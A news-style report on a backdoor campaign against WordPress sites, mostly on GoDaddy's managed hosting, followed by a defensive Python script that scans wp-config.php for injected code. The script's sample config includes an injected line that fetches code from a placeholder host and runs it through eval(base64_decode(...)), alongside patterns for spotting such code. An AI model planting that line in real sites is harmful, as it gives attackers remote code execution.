Security researchers have observed an increase in backdoor infections on WordPress websites. Most of the affected sites are hosted on GoDaddy's Managed WordPress service and were targeted with identical backdoor payloads.
The backdooring of sites
The observation was first disclosed by Wordfence, whose team spotted the malicious activity on March 11.
About 298 websites were backdoored within 24 hours, of which 281 were hosted on GoDaddy.
The backdoor infections affected internet service resellers such as tsoHost, MediaTemple, Domain Factory, 123Reg, Host Europe Managed WordPress, and Heart Internet.
The backdoor payload is a Google search SEO-poisoning tool dating from 2015, injected into wp-config.php. It fetches spam link templates from the C2 server and uses them to inject malicious pages into search results.
The intrusion vector hasn't been uncovered yet, although researchers suspect a supply chain attack.
How does the attack work?
The campaign served predominantly pharmaceutical spam templates to visitors of the compromised websites instead of the sites' real content.
The aim of these templates is to lure visitors into purchasing fake products, costing them money and exposing their payment details.
Researchers say such an attack is difficult to identify and block from the user's side because it happens on the server, not in the browser. As a result, local internet security tools on the visitor's machine do not detect any malicious action.
Conclusion
Cybercriminals never miss a chance to exploit websites for their nefarious goals. Website admins and owners using GoDaddy's platform should scan the wp-config.php file for backdoor injections. Further, admins are advised to remove the backdoor and clean up the spam search engine results it produced.
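As an added illustration of the wp-config.php check recommended above (example code written for this page, not tooling from Wordfence or GoDaddy), the script below flags lines that either match generic indicators of injected PHP or do not fit the shape of a stock wp-config.php. The indicator patterns and the sample config are constructed assumptions, not signatures of this campaign.

```python
import re
from typing import List, Tuple

# Generic indicators of injected PHP (assumed heuristics, not campaign signatures).
SUSPICIOUS = [
    (r"\beval\s*\(", "eval() call"),
    (r"\b(base64_decode|gzinflate|gzuncompress|str_rot13)\s*\(", "obfuscation decoder"),
    (r"\b(file_get_contents|curl_init|fsockopen)\s*\(\s*['\"]https?://", "remote fetch, possible C2 contact"),
    (r"['\"][A-Za-z0-9+/]{60,}={0,2}['\"]", "long base64-looking string literal"),
    (r"\$_(GET|POST|REQUEST|COOKIE)\s*\[", "reads untrusted request input"),
]

# Statement shapes a stock wp-config.php consists of; anything else deserves a look.
ALLOWED = [
    r"^<\?php$", r"^\?>$",
    r"^(//|#|/\*|\*).*", r"^\*/$",
    r"^define\s*\(\s*['\"][A-Z0-9_]+['\"]\s*,.*\)\s*;$",
    r"^\$table_prefix\s*=\s*['\"][A-Za-z0-9_]+['\"]\s*;$",
    r"^if\s*\(\s*!\s*defined\s*\(\s*['\"]ABSPATH['\"]\s*\)\s*\)\s*\{?$",
    r"^\}$",
    r"^require_once\s*\(?\s*ABSPATH\s*\.\s*['\"]wp-settings\.php['\"]\s*\)?\s*;$",
]

def scan_wp_config(source: str) -> List[Tuple[int, str, str]]:
    """Return (line number, reason, line) for each line of a wp-config.php that looks injected."""
    findings = []
    for lineno, raw in enumerate(source.splitlines(), start=1):
        line = raw.strip()
        if not line:
            continue
        # First look for known-bad constructs, then fall back to the allowlist of stock statements.
        reason = next((why for pat, why in SUSPICIOUS if re.search(pat, line)), None)
        if reason is None and not any(re.match(pat, line) for pat in ALLOWED):
            reason = "statement not found in a stock wp-config.php"
        if reason:
            findings.append((lineno, reason, line))
    return findings

# Constructed sample: a normal config with one injected line near the top.
SAMPLE = """<?php
/** Database settings */
define( 'DB_NAME', 'wp_prod' );
$x = file_get_contents('http://example.invalid/tpl'); eval(base64_decode($x));
define( 'DB_USER', 'wpuser' );
$table_prefix = 'wp_';
if ( ! defined( 'ABSPATH' ) ) {
    define( 'ABSPATH', __DIR__ . '/' );
}
require_once ABSPATH . 'wp-settings.php';
"""
```

Unusual but legitimate customisations (extra constants are fine, custom PHP is not) will show up as "statement not found" findings, so treat the output as a triage list rather than a verdict.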